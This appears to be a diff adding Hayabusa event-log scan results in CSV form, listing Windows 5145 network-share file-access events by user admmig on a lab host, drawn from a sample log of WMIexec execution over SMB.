+2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\MMCEx | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\MMCEx\ba21ae2888a2764f3d0df9ccd1e95506 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\MMCFxCommon | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\MMCFxCommon\e2ac72add0eac7c6264297f0a580e745 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\MSBuild | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\MSBuild\5eda447ab5fd1d3ae7ccfa140388c8b0 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\mscorlib | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\a20cafac04a2e9b3bcb5ec4d674775e5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\napcrypt | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\napcrypt\c97155692ee6bc8729624e1a8f6371c1 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\naphlpr | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\naphlpr\8d352c21be1bcfb356df6fec4b6281ec | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\napinit | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\napinit\d39a7c06edcf81bed4470b0a8a5f4bb7 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\napsnap | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\napsnap\285c011d18a31026f939f0b45ce83c81 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1c968d57# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1c968d57#\15c0f15336d9b4baa3bf042b39325008 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1c9175f8# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1c9175f8#\63dfa31687b025a3294657e7d8861b87 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1da2af67# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1da2af67#\65893eb6f605719418cb19fada199945 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio4b37ff64# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio4b37ff64#\7258b8e8dc26562f4f79202ba192af07 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio5ae0f00f# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio5ae0f00f#\37aa83ffa60682e364b3caea876452c9 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio49d6fefe# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio49d6fefe#\504088f50d79f510c3d363ad5a4c58cc | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio53a7a42c# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio53a7a42c#\7b19e9c40f25ea7b5ca13312053ab849 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio080b339b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.240 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio080b339b#\d47241c3aea71d38b02fd1cd03c55474 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.256 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio84a7b877# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.257 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio84a7b877#\2837fdc670a5c72d64db85e2af347449 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.282 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio84a6349c# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.282 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio84a6349c#\7fac8b827be2ffa333eda4ee3560d8f4 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.282 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatioaec034ca# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.282 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatioaec034ca#\155b3e5bd15d88ce27d096bd7c40bd33 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.298 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatiob3047ded# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatiob3047ded#\991f02d895032e2eca7f6baebab96ddc | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatiod51afaa5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatiod51afaa5#\ee4933bf7dcf5304cb565e4f2b833b24 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\PresentationCore | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\PresentationCore\71df43fcb7a7745ef38a6ce40ff33c2d | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\PresentationUI | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\PresentationUI\16135860bdfd502ca9212ab087e9dd26 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\ReachFramework | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\ReachFramework\0dbd8b9aecffc6cde6bb8aab468084f4 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\SecurityAudf6921413# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.329 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\SecurityAudf6921413#\085b01b1533aaba67cfade21b3bda1a5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.329 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Documents | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
